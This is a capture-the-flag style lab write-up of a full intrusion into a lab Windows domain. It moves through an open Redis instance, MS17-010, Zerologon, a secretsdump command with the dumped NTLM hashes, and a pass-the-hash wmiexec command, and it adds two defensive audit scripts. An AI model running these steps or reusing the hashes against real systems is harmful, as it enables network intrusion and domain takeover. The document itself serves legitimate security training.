vulnstack7 writeup

Environment setup

Lab: http://vulnstack.qiyuanxuetang.net/vuln/detail/9/

WEB1(ubuntu):
Dual NIC
192.168.1.15
192.168.52.10

PC1:
Dual NIC
192.168.52.30
192.168.93.20

WEB2(ubuntu):
Dual NIC
192.168.52.20
192.168.93.10

PC2:
192.168.93.40

Domain controller:
192.168.93.30

Attacking the lab

A port scan reveals Redis.

Redis has no authentication, so a GUI tool is used to write an SSH public key through it:

https://github.com/qishibo/AnotherRedisDesktopManager/releases/tag/v1.5.1
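The Redis on WEB1 is reachable without a password, which is the whole reason the public-key write works. The following audit script is an added example (not part of this writeup and not a tool the author used): it parses a redis.conf and reports the settings that produce that exposure, with a constructed weak config beside a constructed hardened one. The password value in the hardened sample is a placeholder.

```python
"""Audit a redis.conf for the settings that leave Redis open to unauthenticated
remote clients. Added example; both sample configs below are constructed."""

# Constructed sample: the kind of config that leaves Redis open.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
# requirepass not set
"""

# Constructed sample: the same instance hardened (password is a placeholder).
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE-WITH-LONG-RANDOM-SECRET   # placeholder value
rename-command CONFIG ""
rename-command FLUSHALL ""
"""


def parse_conf(text):
    """Map each directive to the list of argument lists seen for it.
    Every occurrence is kept, because rename-command legitimately repeats."""
    directives = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives


def audit_redis_conf(text):
    """Return a list of (severity, message) findings; an empty list means clean."""
    d = parse_conf(text)
    findings = []

    # Without a bind directive Redis listens on every interface.
    bind_args = d["bind"][-1] if "bind" in d else []
    loopback_only = bool(bind_args) and all(
        a.lstrip("-") in ("127.0.0.1", "::1", "localhost") for a in bind_args)
    if not loopback_only:
        findings.append(("high", "bind: listens on non-loopback interfaces"))

    has_password = "requirepass" in d and any(a and a[0] for a in d["requirepass"])
    if not has_password:
        findings.append(("high", "requirepass: no authentication configured"))

    pm = d.get("protected-mode", [["yes"]])[-1]
    if pm and pm[0].lower() == "no":
        findings.append(("medium", "protected-mode: disabled"))

    # Disabling CONFIG removes the dir/dbfilename rewrite that file-write abuse relies on.
    renamed = {a[0].upper() for a in d.get("rename-command", []) if a}
    for cmd in ("CONFIG", "FLUSHALL"):
        if cmd not in renamed:
            findings.append(("low", f"rename-command: {cmd} still available"))

    if not loopback_only and not has_password:
        findings.append(("critical",
                         "unauthenticated remote access: any client can issue "
                         "CONFIG SET and SAVE, the condition abused in this lab"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or "no findings")
```

The critical finding only fires when the listener is exposed and unauthenticated at the same time, which is the combination WEB1 had; either fix on its own already removes the remote file-write path.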

Connecting from Kali gives root, and the second address 192.168.52.10 reveals the internal segment.

Upload fscan through msf and scan 192.168.52.0/24.

192.168.52.30 runs Tongda OA and is vulnerable to MS17-010.

192.168.52.20:8000 is Laravel.

192.168.52.10:81 is also Laravel, presumably an nginx reverse proxy to it.

Go after 192.168.52.30 first.

Set up an frp proxy on 192.168.52.10.

Test the proxy; it works.

Two possible routes:

1. Tongda OA vulnerability

This one is done directly from Windows.

Visit http://192.168.52.30:8080/ and use the Tongda OA arbitrary-user login to reach the admin backend.

Once in the backend, the trial period has expired; stuck.

Put this route aside and go for MS17-010.

2. MS17-010

Use proxychains on Kali to go through the proxy.

The Win7 host is compromised.

It has two NICs and reaches 192.168.93.0/24; the domain whoamianony.org is discovered.

msf then became hard to work with, and since this host has outbound internet access, switch to CS.

Obtain a domain user's credentials.

Lateral discovery finds 192.168.93.30 and .40.

The DC is 192.168.93.30; .40 is another host in the domain, also vulnerable to MS17-010.

Use .20 as the proxy and hit .40 first.

The host is compromised, but it has no outbound access, so .20 is used as a relay to bring it into CS.

Next is the domain controller, using CVE-2020-1472 (Zerologon).

Tool used:

https://github.com/VoidSec/CVE-2020-1472

python3 secretsdump.py whoamianony/DC\$@192.168.93.30 -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6be58bfcc0a164af2408d1d3bd313c2a:::
whoami:1001:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
whoamianony.org\bunny:1112:aad3b435b51404eeaad3b435b51404ee:cc567d5556030b7356ee4915ff098c8f:::
whoamianony.org\moretz:1115:aad3b435b51404eeaad3b435b51404ee:ba6723567ac2ca8993b098224ac27d90:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
PC2$:1113:aad3b435b51404eeaad3b435b51404ee:cda321ff9d86cdce7e989cef83ef9f3a:::

proxychains wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec whoamianony/administrator@192.168.93.30

Domain controller compromised.
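Two defensive observations sit in the dump above: Administrator and whoami share an NT hash (same password, which is what makes the Administrator hash usable against the DC), and the DC$ machine account's NT hash is the empty-password hash, the footprint Zerologon leaves after it resets the machine password. The script below is an added example, not the writeup's own code; it parses secretsdump-style lines and reports both conditions, using the lines printed above as its sample input.

```python
"""Audit a secretsdump-style hash dump for shared NT hashes (password reuse)
and accounts with the empty-password NT hash. Added example; the sample
dump is copied from the output shown in this writeup."""

import re
from collections import defaultdict

# NT hash of the empty password (well-known constant).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# name:rid:lmhash:nthash:::  (name may carry a DOMAIN\ prefix)
LINE_RE = re.compile(
    r"^(?P<name>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")

# Sample input: the dump printed above (raw string so the backslashes survive).
SAMPLE_DUMP = r"""
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6be58bfcc0a164af2408d1d3bd313c2a:::
whoami:1001:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
whoamianony.org\bunny:1112:aad3b435b51404eeaad3b435b51404ee:cc567d5556030b7356ee4915ff098c8f:::
whoamianony.org\moretz:1115:aad3b435b51404eeaad3b435b51404ee:ba6723567ac2ca8993b098224ac27d90:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
PC2$:1113:aad3b435b51404eeaad3b435b51404ee:cda321ff9d86cdce7e989cef83ef9f3a:::
"""


def parse_dump(text):
    """Return one dict per well-formed line; anything else is skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        name = m.group("name").split("\\")[-1]     # drop DOMAIN\ prefix
        entries.append({
            "name": name,
            "rid": int(m.group("rid")),
            "nt": m.group("nt").lower(),
            "machine": name.endswith("$"),        # machine accounts end in $
        })
    return entries


def shared_hashes(entries):
    """NT hash -> account names that share it (two or more). The empty hash
    is reported separately, so it is excluded here."""
    groups = defaultdict(list)
    for e in entries:
        groups[e["nt"]].append(e["name"])
    return {h: names for h, names in groups.items()
            if len(names) > 1 and h != EMPTY_NT_HASH}


def empty_passwords(entries):
    """Accounts whose NT hash equals the empty-password hash."""
    return [e["name"] for e in entries if e["nt"] == EMPTY_NT_HASH]


def audit_dump(text):
    entries = parse_dump(text)
    empties = empty_passwords(entries)
    return {
        "shared": shared_hashes(entries),
        "empty_password": empties,
        # A machine account with an empty password should never occur
        # naturally; for a DC it is the Zerologon reset signature.
        "empty_machine": [n for n in empties if n.endswith("$")],
    }


if __name__ == "__main__":
    for key, value in audit_dump(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

Guest normally shows the empty hash because the account is disabled, so the machine-account list is the one that should page someone; a DC$ entry there means the Netlogon channel was already abused and the machine password must be reset before anything else.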
